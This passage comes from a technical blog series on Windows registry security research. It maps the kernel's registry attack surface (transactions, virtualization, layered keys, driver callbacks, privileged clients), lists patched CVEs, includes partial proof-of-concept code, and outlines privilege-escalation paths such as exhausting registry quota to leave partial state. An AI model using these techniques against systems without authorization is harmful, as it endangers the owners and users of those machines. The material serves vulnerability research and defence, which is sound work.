Given that KTM transactions are never enabled for app hives, the possibility of an unprivileged user exploiting this functionality is severely limited.The only option is to focus on KTM log files associated with regular hives that a local user has some control over, namely the user hive (NTUSER.DAT) and the user classes hive (UsrClass.dat). If a transactional operation is performed on a user's HKCU hive, additional .regtrans-ms and .blf files appear in their home directory. Furthermore, if these files don't exist at first, they can be planted on the disk manually, and will be processed by the Windows kernel after logging out and logging back in.Interestingly, even when the KTM log files are actively in use, they have the read sharing mode enabled.This means that a user can write data to these logs by performing transactional operations, and read from them directly at the same time.
Historically, the handling of KTM logs has been affected by a significant number of security issues.Between 2019 and 2020, James Forshaw reported three serious bugs in this code: CVE-2019-0959, CVE-2020-1377, and CVE-2020-1378.Subsequently, during my research, I discovered three more: CVE-2023-28271, CVE-2023-28272, and CVE-2023-28293.However, the strangest thing is that, according to my tests, the entire logic for restoring the registry state from KTM logs stopped working due to code refactoring introduced in Windows 10 1607 (almost 9 years ago) and has not been fixed since.I described this observation in another report related to transactions, in a section called "KTM transaction recovery code". I'm not entirely sure whether I'm making a mistake in testing, but if this is truly the case, it means that the entire recovery mechanism currently serves no purpose and only needlessly increases the system's attack surface.Therefore, it could be safely removed or, at the very least, actually fixed.
Direct registry operations through standard syscalls
Direct operations on keys and values are the core of the registry and make up most of its associated code within the Windows kernel.These basic operations don't need any special permissions and are accessible by all users, so they constitute the primary attack surface available to a local attacker.These actions have been summarized at the beginning ofblog post #2, and should probably be familiar by now.As a recap, here is a table of the available operations, including the corresponding high-level API function, system call name, and internal kernel function name if it differs from the syscall:
Operation name
Registry API name(s)
System call(s)
Internal kernel handler (if different than syscall)
A regular user can directly load only application hives, using the RegLoadAppKey function or its corresponding syscalls with the REG_APP_HIVE flag.Loading standard hives, using the RegLoadKey function, is reserved for administrators only.However, this operation is still indirectly accessible to other users through the NTUSER.MAN hive and the Profile Service, which can load it as a user hive during system login.
When selecting API functions for the table above, I prioritized their latest versions (often with the "Ex" suffix, meaning "extended").I also chose those that are the thinnest wrappers and closest in functionality to their corresponding syscalls on the kernel side.In the official Microsoft documentation, you'll also find many older/deprecated versions of these functions, which were available in early Windows versions and now exist solely for backward compatibility (e.g., RegOpenKey, RegEnumKey).Additionally, there are also helper functions that implement more complex logic on the user-mode side (e.g., RegDeleteTree, which recursively deletes an entire subtree of a given key), but they don't add anything in terms of the kernel attack surface.
There are several operations natively supported by the kernel that do not have a user-mode equivalent, such as NtQueryOpenSubKeys or NtSetInformationKey.The only way to use these interfaces is to call their respective system calls directly, which is most easily achieved by calling their wrappers with the same name in the ntdll.dll library.Furthermore, even when a documented API function exists, it may not expose all the capabilities of its corresponding system call.For example, the RegQueryKeyInfo function returns some information about a key, but much more can be learned by using NtQueryKey directly with one of the supported information classes.
Moreover, there is a group of syscalls that do require administrator rights (specifically SeBackupPrivilege, SeRestorePrivilege, or PreviousMode set to KernelMode).These syscalls are used either for registry management by the kernel or system services, or for purely administrative tasks (such as performing registry backups).They are not particularly interesting from a security research perspective, as they cannot be used to elevate privileges, but it is worth mentioning them by name:
NtCompactKeys
NtCompressKey
NtFreezeRegistry
NtInitializeRegistry
NtLockRegistryKey
NtQueryOpenSubKeysEx
NtReplaceKey
NtRestoreKey
NtSaveKey
NtSaveKeyEx
NtSaveMergedKeys
NtThawRegistry
NtUnloadKey
NtUnloadKey2
NtUnloadKeyEx
Incorporating advanced features
Despite the fact that most power users are familiar with the basic registry operations (e.g., from using Regedit.exe), there are still some modifiers that can change the behavior of these operations, thereby complicating their implementation and potentially leading to interesting bugs.To use these modifiers, additional steps are often required, such as enabling registry virtualization, creating a transaction, or loading a differencing hive.When this is done, the information about the special key properties are encoded within the internal kernel structures, and the key handle itself is almost indistinguishable from other handles as seen by the user-mode application.When operating on such advanced keys, the logic for their handling is executed in the standard registry syscalls transparently to the user.The diagram below illustrates the general, conceptual control flow in registry-related system calls:
This is a very simplified outline of how registry syscalls work, but it shows that a function theoretically supporting one operation can actually hide many implementations that are dynamically chosen based on various factors.In terms of specifics, there are significant differences depending on the operation and whether it is a "read" or "write" one.For example, in "read" operations, the execution paths for transactional and non-transactional operations are typically combined into one that has built-in transaction support but can also operate without them.On the other hand, in "write" operations, normal and transactional operations are always performed differently, but there isn't much code dedicated to layered keys (except for the so-called key promotion operations), since when writing to a layered key, the state of keys lower on the stack is usually not as important.As for the "Internal operation handler" area marked within the large rectangle with the dotted line, these are internal functions responsible for the core logic of a specific operation, and whose names typically begin with "Cm" instead of "Nt". For example, for the NtDeleteKey syscall, the corresponding internal handler is CmDeleteKey, for NtQueryKey it is CmQueryKey, for NtEnumerateKey it is CmEnumerateKey, and so on.
In the following sections, we will take a closer look at each of the possible complications.
Predefined keys and symbolic links
Predefined keys were deprecated in 2023, so I won't spend much time on them here.It's worth mentioning that on modern systems, it wasn't possible to create them in any way using the API, or even directly using syscalls.The only way to craft such a key in the registry was to create it in binary form in a controlled hive file and have it loaded via RegLoadAppKey or as a user hive.These keys had very strange semantics, both at the key node level (unusual encoding of _CM_KEY_NODE.ValueList) and at the kernel key body object level (non-standard value of _CM_KEY_BODY.Type).Due to the need to filter out these keys at an early stage of syscall execution, there are special helper functions whose purpose is to open the key by handle and verify whether it is or isn't a predefined handle (CmObReferenceObjectByHandle and CmObReferenceObjectByName). Consequently, hunting for bugs related to predefined handles involved verifying whether each syscall used the above wrappers correctly, and whether there was some other way to perform an operation on this type of key while bypassing the type check.As I have mentioned, this is now just a thing of the past, as predefined handles in input hives are no longer supported and therefore do not pose a security risk to the system.
When it comes to symbolic links, this is a semi-documented feature that requires calling the RegCreateKeyEx function with the special REG_OPTION_CREATE_LINK flag to create them.Then, you need to set a value named "SymbolicLinkValue" and of type REG_LINK, which contains the target of the symlink as an absolute, internal registry path (\Registry\...) written using wide characters.From that point on, the link points to the specified path.However, it's important to remember that traversing symbolic links originating from non-system hives is heavily restricted: it can only occur within a single "trust class" (e.g., between the user hive and user classes hive of the same user).As a result, links located in app hives are never fully functional, because each app hive resides in its own isolated trust class, and they cannot reference themselves either, as references to paths starting with "\Registry\A" are blocked by the Windows kernel.
As for auditing symbolic links, they are generally resolved during the opening/creation of a key.Therefore, the analysis mainly involves the CmpParseKey function and lower-level functions called within it, particularly CmpGetSymbolicLinkTarget, which is responsible for reading the target of a given symlink and searching for it in existing registry structures. Issues related to symlinks can also be found in registry callbacks registered by third-party drivers, especially those that handle the RegNtPostOpenKey/RegNtPostCreateKey and similar operations. Correctly handling "reparse" return values and the multiple call loops performed by the NT Object Manager is not an easy feat to achieve.
Registry virtualization
Registry virtualization, introduced in Windows Vista, ensures backward compatibility for older applications that assume administrative privileges when using the registry.This mechanism redirects references between HKLM\Software and HKU\<SID>_Classes\VirtualStore subkeys transparently, allowing programs to "think" they write to the system hive even though they don't have sufficient permissions for it.The virtualization logic, integrated into nearly every basic registry syscall, is mostly implemented by three functions:
CmKeyBodyRemapToVirtualForEnum: Translates a real key inside a virtualized hive (HKLM\Software) to a virtual key inside the VirtualStore of the user classes hive during read-type operations.This is done to merge the properties of both keys into a single state that is then returned to the caller.
CmKeyBodyRemapToVirtual: Translates a real key to its corresponding virtual key, and is used in the key deletion and value deletion operations. This is done to delete the replica of a given key in VirtualStore or one of its values, instead of its real instance in the global hive.
CmKeyBodyReplicateToVirtual: Replicates the entire key structure that the caller wants to create in the virtualized hive, inside of the VirtualStore.
All of the above functions have a complicated control flow, both in terms of low-level implementation (e.g., they implement various registry path conversions) and logically – they create new keys in the registry, merge the states of different keys into one, etc. As a result, it doesn't really come as a big surprise that the code has been affected by many vulnerabilities. Triggering virtualization doesn't require any special rights, but it does need a few conditions to be met:
Virtualization must be specifically enabled for a given process.This is not the default behavior for 64-bit programs but can be easily enabled by calling the SetTokenInformation function with the TokenVirtualizationEnabled argument on the security token of the process.
Depending on the desired behavior, the appropriate combination of VirtualSource/VirtualTarget/VirtualStore flags should be set in _CM_KEY_NODE.Flags. This can be achieved either through binary control over the hive or by setting it at runtime using the NtSetInformationKey call with the KeySetVirtualizationInformation argument.
The REG_KEY_DONT_VIRTUALIZE flag must not be set in the _CM_KEY_NODE.VirtControlFlags field for a given key.This is usually not an issue, but if necessary, it can be adjusted either in the binary representation of the hive or using the NtSetInformationKey call with the KeyControlFlagsInformation argument.
In specific cases, the source key must be located in a virtualizable hive.In such scenarios, the HKLM\Software\Microsoft\DRM key becomes very useful, as it meets this condition and has a permissive security descriptor that allows all users in the system to create subkeys within it.
With regards to the first two points, many examples of virtualization-related bugs can be found in the Project Zero bug tracker.These reports include proof-of-concept code that correctly sets the appropriate flags.For simplicity, I will share that code here as well; the two C++ functions responsible for enabling virtualization for a given security token and registry key are shown below:
printf("OpenProcessToken failed with error %u\n",GetLastError());
return1;
}
EnableTokenVirtualization(hToken,TRUE);
//
// Enable virtualization for the key.
//
hKey=RegOpenKeyExW(...);
EnableKeyVirtualization(hKey,
/*VirtualTarget=*/TRUE,
/*VirtualStore=*/TRUE,
/*VirtualSource=*/FALSE);
Transactions
There are two types of registry transactions: KTM and lightweight.The former are transactions implemented on top of the tm.sys (Transaction Manager) driver, and they try to provide certain guarantees of transactional atomicity both during system run time and even across reboots. The latter, as the name suggests, are lightweight transactions that exist only in memory and whose task is to provide an easy and quick way to ensure that a given set of registry operations is applied atomically.As potential attackers, there are three parts of the interface that we are interested in the most: creating a transaction object, rolling back a transaction, and committing a transaction.The functions responsible for all three actions in each type of transaction are shown in the table below:
As we can see, the KTM has a public, documented API interface, which cannot be said for lightweight transactions that can only be used via syscalls.Their definitions, however, are not too difficult to reverse engineer, and they come down to the following prototypes:
Upon the creation of a transaction object, whether of type TmTransactionObjectType (KTM) or CmRegistryTransactionType (lightweight), its subsequent usage becomes straightforward.The transaction handle is passed to either the RegOpenKeyTransacted or the RegCreateKeyTransacted function, yielding a key handle.The key's internal properties, specifically the key body structure, will reflect its transactional nature.Operations on this key proceed identically to the non-transactional case, using the same functions.However, changes are temporarily confined to the transaction context, isolated from the global registry view.Upon the completion of all transactional operations, the user may elect either to discard the changes via a rollback, or apply them atomically through a commit.From the developer's perspective, this interface is undeniably convenient.
From an attack surface perspective, there's a substantial amount of code underlying the transaction functionality.Firstly, the handler for each base operation includes code to verify that the key isn't locked by another transaction, to allocate and initialize a UoW (unit of work) object, and then write it to the internal structures that describe the transaction.Secondly, to maintain consistency with the new functionality, the existing non-transactional code must first abort all transactions associated with a given key before it can be modified.
But that's not the end of the story.The commit process itself is also complicated, as it must cleverly circumvent various registry limitations resulting from its original design.In 2023, most of the code responsible for KTM transactions was removed as a result of CVE-2023-32019, but there is still a second engine that was initially responsible for lightweight transactions and now handles all of them.It consists of two stages: "Prepare" and "Commit". During the prepare stage, all steps that could potentially fail are performed, such as allocating all necessary cells in the target hive. Errors are allowed and correctly handled in the prepare stage, because the globally visible state of the registry does not change yet.This is followed by the commit stage, which is designed so that nothing can go wrong – it no longer performs any dynamic allocations or other complex operations, and its whole purpose is to update values in both the hive and the kernel descriptors so that transactional changes become globally visible.The internal prepare handlers for each individual operation have names starting with "CmpLightWeightPrepare" (e.g., CmpLightWeightPrepareAddKeyUoW), while the corresponding commit handlers start with "CmpLightWeightCommit" (e.g., CmpLightWeightCommitAddKeyUoW).These are the two main families of functions that are most interesting from a vulnerability research perspective.In addition to them, it is also worth analyzing the rollback functionality, which is used both when the rollback is requested directly by the user and when an error occurs in the prepare stage.This part is mainly handled by the CmpTransMgrFreeVolatileData function.
Layered keys
Layered keys are the latest major change of this type in the Windows Registry, introduced in 2016. They overturned many fundamental assumptions that had been in place until then. A given logical key no longer consists solely of one key node and a maximum of one active KCB, but of a whole stack of these objects: from the layer height of the given hive down to layer zero, which is the base hive.A key that has a key node may in practice be non-existent (if marked as a tombstone), and vice versa, a key without a key node may logically exist if there is an existing key with the same name lower in its stack.In short, this whole containerization mechanism has doubled the complexity of every single registry operation, because:
Querying for information about a key has become more difficult, because instead of gathering information from just one key, it has to be potentially collected from many keys at once and combined into a coherent whole for the caller.
Performing any "write" operations has become more difficult because before writing any information to the key at a given nesting level, you first need to make sure that the key and all its ancestors in a given hive exist, which is done in a complicated process called "key promotion".
Deleting and renaming a key has become more difficult, because you always have to consider and correctly handle higher-level keys that rely on the one you are modifying. This is especially true for Merge-Unbacked keys, which do not have their own representation and only reflect the state of the keys at a lower level.This also applies to ordinary keys from hives under HKLM and HKU, which by themselves have nothing to do with differencing hives, but as an integral part of the registry hierarchy, they also have to correctly support this feature.
Performing security access checks on a key has become more challenging due to the need to accurately pinpoint the relevant security descriptor on the key stack first.
Overall, the layered keys mechanism is so complex that it could warrant an entire blog post (or several) on its own, so I won't be able to explain all of its aspects here.Nevertheless, its existence will quickly become clear to anyone who starts reversing the registry implementation.The code related to this functionality can be identified in many ways, for example:
By references to functions that initialize the key node stack / KCB stack objects (i.e., CmpInitializeKeyNodeStack, CmpStartKcbStack, and CmpStartKcbStackForTopLayerKcb),
By dedicated functions that implement a given operation specifically on layered keys that end with "LayeredKey" (e.g., CmDeleteLayeredKey, CmEnumerateValueFromLayeredKey, CmQueryLayeredKey),
By references to the KCB.LayerHeight field, which is very often used to determine whether the code is dealing with a layered key (height greater than zero) or a base key (height equal to zero).
I encourage those interested in further exploring this topic to read Microsoft's Containerized Configuration patent (US20170279678A1), the "Registry virtualization" section in Chapter 10 of Windows Internals (Part 2, 7th Edition), as well as my previous blog post #6, where I briefly described many internal structures related to layered keys.All of these references are great resources that can provide a good starting point for further analysis.
When it comes to layered keys in the context of attack entry points, it's important to note that loading custom differencing hives in Windows is not straightforward.As I wrote inblog post #4, loading this type of hive is not possible at all through any standard NtLoadKey-family syscall.Instead, it is done by sending an undocumented IOCTL 0x220008 to \Device\VRegDriver, which then passes this request on to an internal kernel function named CmLoadDifferencingKey.Therefore, the first obstacle is that in order to use this IOCTL interface, one would have to reverse engineer the layout of its corresponding input structure. Fortunately, I have already done it and published it in the blog post under the VRP_LOAD_DIFFERENCING_HIVE_INPUT name. However, a second, much more pressing problem is that communicating with the VRegDriver requires administrative rights, so it can only be used for testing purposes, but not in practical privilege escalation attacks.
So, what options are we left with?Firstly, there are potential scenarios where the exploit is packaged in a mechanism that legitimately uses differencing hives, e.g., an MSIX-packaged application running in an app silo, or a specially crafted Docker container running in a server silo.In such cases, we provide our own hives by design, which are then loaded on the victim’s system on our behalf when the malicious program or container is started.The second option is to simply ignore the inability to load our own hive and use one already present in the system.In a default Windows installation, many built-in applications use differencing hives, and the \Registry\WC key can be easily enumerated and opened without any problems (unlike \Registry\A).Therefore, if we launch a program running inside an app silo (e.g., Notepad) as a local user, we can then operate on the differencing hives loaded by it. This is exactly what I did in most of my proof-of-concept exploits related to this functionality.Of course, it is possible that a given bug will require full binary control over the differencing hive in order to trigger it, but this is a relatively rare case: of the 10 vulnerabilities I identified in this code, only two of them required such a high degree of control over the hive.
Alternative registry attack targets
The most crucial attack surface associated with the registry is obviously its implementation within the Windows kernel. However, other types of software interact with the registry in many ways and can be also prone to privilege escalation attacks through this mechanism. They are discussed in the following sections.
Drivers implementing registry callbacks
Another area where potential registry-related security vulnerabilities can be found is Registry Callbacks.This mechanism, first introduced in Windows XP and still present today, provides an interface for kernel drivers to log or interfere with registry operations in real-time.One of the most obvious uses for this functionality is antivirus software, which relies on registry monitoring.Microsoft, aware of this need but wanting to avoid direct syscall hooking by drivers, was compelled to provide developers with an official, documented API for this purpose.
From a technical standpoint, callbacks can be registered using either the CmRegisterCallbackfunction or its more modern version, CmRegisterCallbackEx.The documentation for these functions serves as a good starting point for exploring the mechanism, as it seamlessly leads to the documentation of the callback function itself, and from there to the documentation of all the structures that describe the individual operations.Generally speaking, callbacks can monitor virtually any type of registry operation, both before ("pre" callbacks) and after ("post" callbacks) it is performed.They can be used to inspect what is happening in the system and log the details of specific events of interest.Callbacks can also influence the outcome of an operation.In "pre" notifications, they can modify input data or completely take control of the operation and return arbitrary information to the caller while bypassing the standard operation logic.During "post" notification handling, it is possible to influence both the status returned to the user and the output data.Overall, depending on the amount and types of operations supported in a callback, a completely error-free implementation can be really difficult to write.It requires excellent knowledge of the inner workings of the registry, as well as a very thorough reading of the documentation related to callbacks.The contracts that exist between the Windows kernel and the callback code can be very complicated, so in addition to the sources mentioned above, it's also worth reading the entire separate series of seven articles detailing various callback considerations, titled Filtering Registry Calls.
Here are some examples of things that can go wrong in the implementation of callbacks:
Standard user-mode memory access bugs.As per the documentation (refer to the table at the bottom of the Remarks section), pointers to output data received in "post" type callbacks contain the original user-mode addresses passed to the syscall by the caller.This means that if the callback wants to reference this data in any way, the only guarantee it has is that these pointers have been previously probed.However, it is still important to access this memory within a try/except block and to avoid potential double-fetch vulnerabilities by always copying the data to a kernel-mode buffer first before operating on it.
A somewhat related but higher-level issue is excessive trust in the output data structure within "post" callbacks.The problem is that some registry syscalls return data in a strictly structured way, and since the "post" callback executes before returning to user mode, it might seem safe to trust that the output data conforms to its documented format (if one wants to use or slightly modify it).An example of such a syscall is NtQueryKey, which returns a specific structure for each of the several possible information classes.In theory, it would appear that a malicious program has not yet had the opportunity to modify this data, and it should still be valid when the callback executes.In practice, however, this is not the case, because the output data has already been copied to user-mode, and there may be a parallel user thread modifying it concurrently.Therefore, it is very important that if one wants to use the output data in the "post" callback, they must first fully sanitize it, assuming that it may be completely arbitrary and is as untrusted as any other input data.
Moving up another level, it's important to prevent confused deputy problems that exploit the fact that callback code runs with kernel privileges.For example, if a callback wanted to redirect access to certain registry paths to another location, and it used the ZwCreateKey call without the OBJ_FORCE_ACCESS_CHECKflag to do so, it would allow an attacker to create keys in locations where they normally wouldn't have access.
Bugs in the emulation of certain operations in "pre"-type callbacks.If a callback decides to handle a given request on its own and signal this to the kernel by returning the STATUS_CALLBACK_BYPASS code, it is responsible for filling all important fields in the corresponding REG_XXX_KEY_INFORMATION structure so that, in accordance with the expected syscall behavior, the output data is correctly returned to the caller (source: "When a registry filtering driver's RegistryCallback routine receives a pre-notification [...]" and "Alternatively, if the driver changes a status code from failure to success, it might have to provide appropriate output parameters.").
Bugs in "post"-type callbacks that change an operation's status from success to failure. If we want to block an operation after it has already been executed, we must remember that it has already occurred, with all its consequences and side effects.To successfully pretend that it did not succeed, we would have to reverse all its visible effects for the user and release the resources allocated for this purpose.For some operations, this is very difficult or practically impossible to do cleanly, so I would personally recommend only blocking operations at the "pre" stage and refraining from trying to influence their outcome at the "post" stage (source: "If the driver changes a status code from success to failure, it might have to deallocate objects that the configuration manager allocated.").
Challenges presented by error handling within "post"-type callbacks.As per the documentation, the kernel only differentiates between a STATUS_CALLBACK_BYPASS return value and all others, which means that it doesn't really discern callback success or failure.This is somewhat logical since, at this stage, there isn't a good way to handle failures – the operation has already been performed. On the other hand, it may be highly unintuitive, as the Windows kernel idiom "if (!NT_SUCCESS(Status)) { return Status; }" becomes ineffective here. If an error is returned, it won't propagate to user mode, and will only cause premature callback exit, potentially leaving some important operations unfinished.To address this, you should design "post" callbacks to be inherently fail-safe (e.g., include no dynamic allocations), or if this isn't feasible, implement error handling cautiously, ensuring that minor operation failures don't compromise the callback's overall logical/security guarantees.
Issues surrounding the use of a key object pointer passed to the callback, in one of a few specific scenarios where it can have a non-NULL value but not point to a valid key object.This topic is explored in a short article in Microsoft Learn:Invalid Key Object Pointers in Registry Notifications.
Issues in open/create operation callbacks due to missing or incorrect handling of symbolic links and other redirections, which are characterized by the return values STATUS_REPARSE and STATUS_REPARSE_GLOBAL.
Bugs that result from a lack of transaction support where it is needed. This could be an incorrect assumption that every operation performed on the registry is non-transactional and its effect is visible immediately, and not only after the transaction is committed.The API function that is used to retrieve the transaction associated with a given key (if it exists) during callback execution is CmGetBoundTransaction.
Issues arising from using the older API version, CmCallbackGetKeyObjectID, instead of the newer CmCallbackGetKeyObjectIDEx.The older version has some inherent problems discussed in the documentation, such as returning an outdated key path if the key name has been changed by an NtRenameKey operation.
Issues stemming from an overreliance on the CmCallbackGetKeyObjectID(Ex) function to retrieve a key's full path.A local user can cause these functions to deterministically fail by creating and operating on a key with a path length exceeding 65535 bytes (the maximum length of a string represented by the UNICODE_STRING structure).This can be achieved using the key renaming trick described in CVE-2022-37990, and results in the CmCallbackGetKeyObjectID(Ex) function returning the STATUS_INSUFFICIENT_RESOURCES error code.This is problematic because the documentation for this function does not mention this error code, and there is no way to defend against it from the callback's perspective.The only options are to avoid relying on retrieving the full key path altogether, or to implement a defensive fallback plan if this operation fails.
Logical bugs arising from attempts to block access to certain registry keys by path, but neglecting the key rename operation, which can change the key's name dynamically and bypass potential filtering logic in the handling of the open/create operations.Notably, it's difficult to blame developers for such mistakes, as even the official documentation discourages handling NtRenameKey operations, citing its high complexity (quote: "Several registry system calls are not documented because they are rarely used [...]").
As we can see, developers using these types of callbacks can fall into many traps, and the probability of introducing a bug increases with the complexity of the callback's logic.
As a security researcher, there are two approaches to enumerating this attack surface to find vulnerable callbacks: static and dynamic.The static approach involves searching the file system (especially C:\Windows\system32\drivers) for the "CmRegisterCallback" string, as every driver that registers a callback must refer to this function or its "Ex" equivalent. As for the dynamic approach, the descriptors of all callbacks in the system are linked together in a doubly-linked list that begins in the global nt!CallbackListHead object.Although the structure of these descriptors is undocumented, my analysis indicates that the pointer to the callback function is located at offset 0x28 in Windows 11.Therefore, all callbacks registered in the system at a given moment can be listed using the following WinDbg command:
As shown, even on a clean Windows 11 system, the operating system and its drivers register a substantial number of callbacks.In the listing above, the first line of output can be ignored, as it refers to the nt!CallbackListHead object, which is the beginning of the list and not a real callback descriptor.The remaining functions are associated with the following modules:
WdFilter!MpRegCallback: a callback registered by Windows Defender, the default antivirus engine running on Windows.
applockerfltr!SmpRegistryCallback: a callback registered by the Smartlocker Filter Driver, which is one of the drivers that implement the AppLocker/SmartLocker functionality at the kernel level.
UCPD+0x5dd0: a callback associated with the UCPD.sys driver, which expands to "User Choice Protection Driver". This is a module that prevents third-party software from modifying the default application settings for certain file types and protocols, such as web browsers and PDF readers.As we can infer from the format of this symbol and its unresolved name, Microsoft does not currently provide PDB debug symbols for the executable image, but some information online indicates that such symbols were once available for older builds of the driver.
nt!VrpRegistryCallback: a callback implemented by the VRegDriver, which is part of the core Windows kernel executable image, ntoskrnl.exe.It plays a crucial role in the system, as it is responsible for redirecting key references to their counterparts within differencing hives for containerized processes.It is likely the most interesting and complex callback registered by default in Windows.
bfs!BfsRegistryCallback: the callback is a component of the Brokering File System driver. It is primarily responsible for supporting secure file access for applications running in an isolated environment (AppContainers).However, it also has a relatively simple registry callback that supports key opening/creation operations.It is not entirely clear why the functionality wasn't simply incorporated into the VrpRegistryCallback, which serves a very similar purpose.
In my research, I primarily focused on reviewing the callback invocations in individual registry operations (specifically calls to the CmpCallCallBacksEx function), and on the correctness of the VrpRegistryCallback function implementation. As a result, I discoveredCVE-2023-38141 in the former area, and three further bugs in the VRegDriver (CVE-2023-38140,CVE-2023-36803 andCVE-2023-36576).These reports serve as a very good example of the many types of problems that can occur in registry callbacks.
Privileged registry clients: programs and drivers
The final attack target related to the registry are the highly privileged users of this interface, that is, user-mode processes running with administrator/system rights, and kernel drivers that operate on the registry. The registry is a shared resource by design, and apart from app hives mounted in the special \Registry\A key, every program in the system can refer to any active key as long as it has the appropriate permissions.And for a malicious user, this means that they can try to exploit weaknesses exhibited by other processes when interacting with the registry, and secondly, they can try to actively interfere with them.I can personally imagine two main types of issues related to incorrect use of the registry, and both of them are quite high-level by nature.
The first concern is related to the fact that the registry, as a part of the NT Object Manager model, undergoes standard access control through security access checks.Each registry key is mandatorily assigned a specific security descriptor.Therefore, as the name implies, it is crucial for system security that each key's descriptor has the minimum permissions required for proper functionality, while aligning with the author's intended security model for the application.
From a technical perspective, a specific security descriptor for a given key can be set either during its creation through the lpSecurityAttributes argument of RegCreateKeyExW, or separately by calling the RegSetKeySecurityAPI. If no descriptor is explicitly set, the key assumes a default descriptor based largely on the security settings of its parent key.This model makes sense from a practical standpoint.It allows most applications to avoid dealing with the complexities of custom security descriptors, while still maintaining a reasonable level of security, as high-level keys in Windows typically have well-configured security settings.Consider the well-known HKLM\Software tree, where Win32 applications have stored their global settings for many years.The assumption is that ordinary users have read access to the global configuration within that tree, but only administrators can write to it.If an installer or application creates a new subkey under HKLM\Software without explicitly setting a descriptor, it inherits the default security properties, which is sufficient in most cases.
However, certain situations require extra care to properly secure registry keys.For example, if an application stores highly sensitive data (e.g., user passwords) in the registry, it is important to ensure that both read and write permissions are restricted to the smallest possible group of users (e.g., administrators only).Additionally, when assigning custom security descriptors to keys in global system hives, you should exercise caution to avoid inadvertently granting write permissions to all system users.Furthermore, if a user has KEY_CREATE_LINK access to a global key used by higher-privileged processes, they can create a symbolic link within it, potentially resulting in a "confused deputy" problem and the ability to create registry keys under any path.In summary, for developers creating high-privilege code on Windows and utilizing the registry, it is essential to carefully handle the security descriptors of the keys they create and operate on.From a security researcher's perspective, it could be useful to develop tooling to list all keys that allow specific access types to particular groups in the system and run it periodically on different Windows versions and configurations.This approach can lead to some very easy bug discoveries, as it doesn't require any time spent on reverse engineering or code auditing.
The second type of issue is more subtle and arises because a single "configuration unit" in the registry sometimes consists of multiple elements (keys, values) and must be modified atomically to prevent an inconsistent state and potential vulnerabilities.For such cases, there is support for transactions in the registry.If a given process manages a configuration that is critical to system security and in which different elements must always be consistent with each other, then making use of the Transacted Registry (TxR) is practically mandatory.A significantly worse, though somewhat acceptable solution may be to implement a custom rollback logic, i.e., in the event of a failure of some individual operation, manually reversing the changes that have been applied so far.The worst case scenario is when a privileged program does not realize the seriousness of introducing partial changes to the registry, and implements its logic in a way typical of using the API in a best-effort manner, i.e.: calling Win32 functions as long as they succeed, and when any of them returns an error, then simply passing it up to the caller without any additional cleanup.
Let's consider this bug class on the example of a hypothetical service that, through some local inter-process communication interface, allows users to register applications for startup.It creates a key structure under the HKLM\Software\CustomAutostart\<Application Name> path, and for each such key it stores two values: the command line to run during system startup ("CommandLine"), and the username with whose privileges to run it ("UserName").If the username value does not exist, it implicitly assumes that the program should start with system rights.Of course, the example service intends to be secure, so it only allows setting the username to the one corresponding to the security token of the requesting process. Operations on the registry take place in the following order:
Create a new key named HKLM\Software\CustomAutostart\<Application Name>,
Set the "CommandLine" value to the string provided by the client,
Set the "UserName" value to the string provided by the client.
The issue with this logic is that it's not transactional – if an error occurs, the execution simply aborts, leaving the partial state behind. For example, if operation #3 fails for any reason, an entry will be added to the autostart indicating that a controlled path should be launched with system rights.This directly leads to privilege escalation and was certainly not the developer's intention.One might wonder why any of these operations would fail, especially in a way controlled by an attacker.The answer is simple and was explained in the "Susceptibility to mishandling OOM conditions" section.A local attacker has at least two ways of influencing the success or failure of registry operations in the system: by filling the space of the hive they want to attack (if they have write access to at least one of its keys) or by occupying the global registry quota in memory, represented by the global nt!CmpGlobalQuota variable.Unfortunately, finding such vulnerabilities is more complicated than simply scanning the entire registry for overly permissive security descriptors. It requires identifying candidates of registry operations in the system that have appropriate characteristics (high privilege process, lack of transactionality, sensitivity to a partial/incomplete state), and then potentially reverse-engineering the specific software to get a deeper understanding of how it interacts with the registry. Tools like Process Monitormay come in handy at least in the first part of the process.
One example of a vulnerability related to the incorrect guarantee of atomicity of system-critical structures is CVE-2024-26181.As a result of exhausting the global registry quota, it could lead to permanent damage to the HKLM\SAM hive, which stores particularly important information about users in the system, their passwords, group memberships, etc.
Vulnerability primitives
In this chapter, we will focus on classifying registry vulnerabilities based on the primitives they offer, and briefly discuss their practical consequences and potential exploitation methods.
Pool memory corruption
Pool memory corruption is probably the most common type of low-level vulnerability in the Windows kernel.In the context of the registry, this bug class is somewhat rarer than in other ring-0 components, but it certainly still occurs and is entirely possible. It manifests in its most "pure" form when the corruption happens within an auxiliary object that is temporarily allocated on the pools to implement a specific operation. One such example case is areport concerning three vulnerabilities—CVE-2022-37990, CVE-2022-38038, and CVE-2022-38039—all stemming from a fairly classic 16-bit integer overflow when calculating the length of a dynamically allocated buffer.Another example is CVE-2023-38154, where the cause of the buffer overflow was slightly more intricate and originated from a lack of error handling in one of the functions responsible for recovering the hive state from LOG files.
The second type of pool memory corruption that can occur in the registry is problems managing long-lived objects that are used to cache some information from the hive mapping in more readily accessible pool memory — such as those described in post #6.In this case, we are usually dealing with UAF-type conditions, like releasing an object while there are still some active references to it.If I had to point to one object that could be most prone to this type of bug, it would probably be the Key Control Block, which is reference counted, used by the implementation of almost every registry syscall, and for which there are some very strong invariants critical for memory safety (e.g., the existence of only one KCB for a particular key in the global KCB tree).One issue related to KCBs was CVE-2022-44683, which resulted from incorrect handling of predefined keys in the NtNotifyChangeMultipleKeys system call.
Another, slightly different category of UAFs on pools are situations in which this type of condition is not a direct consequence of a vulnerability, but more of a side effect.Let's take security descriptors as an example: they are located in the hive space, but the kernel also maintains a cache reflecting the state of these descriptors on the kernel pools (in _CMHIVE.SecurityCache and related fields).Therefore, if for some reason a security descriptor in the hive is freed prematurely, this problem will also be automatically reflected in the cache, and some keys may start to have a dangling KCB.CachedSecurity pointer set to the released object.I have taken advantage of this fact many times in my reports to Microsoft, because it was very useful for reliably triggering crashes. While generating a bugcheck based on the UAF of the _CM_KEY_SECURITY structure in the hive is possible, it is much more convoluted than simply turning on the Special Pool mechanism and making the kernel refer to the cached copy of the security descriptor (a few examples: CVE-2023-23421, CVE-2023-35382, CVE-2023-38139).In some cases, exploiting memory corruption on pools may also offer some advantages over exploiting hive-based memory corruption, so it is definitely worth remembering this behavior for the future.
When it comes to the strictly technical aspects of kernel pool exploitation, I won't delve into it too deeply here.I didn't specifically focus on it in my research, and there aren't many interesting registry-specific details to mention in this context. If you are interested to learn more about this topic, please refer to the resources available online.
Hive memory corruption
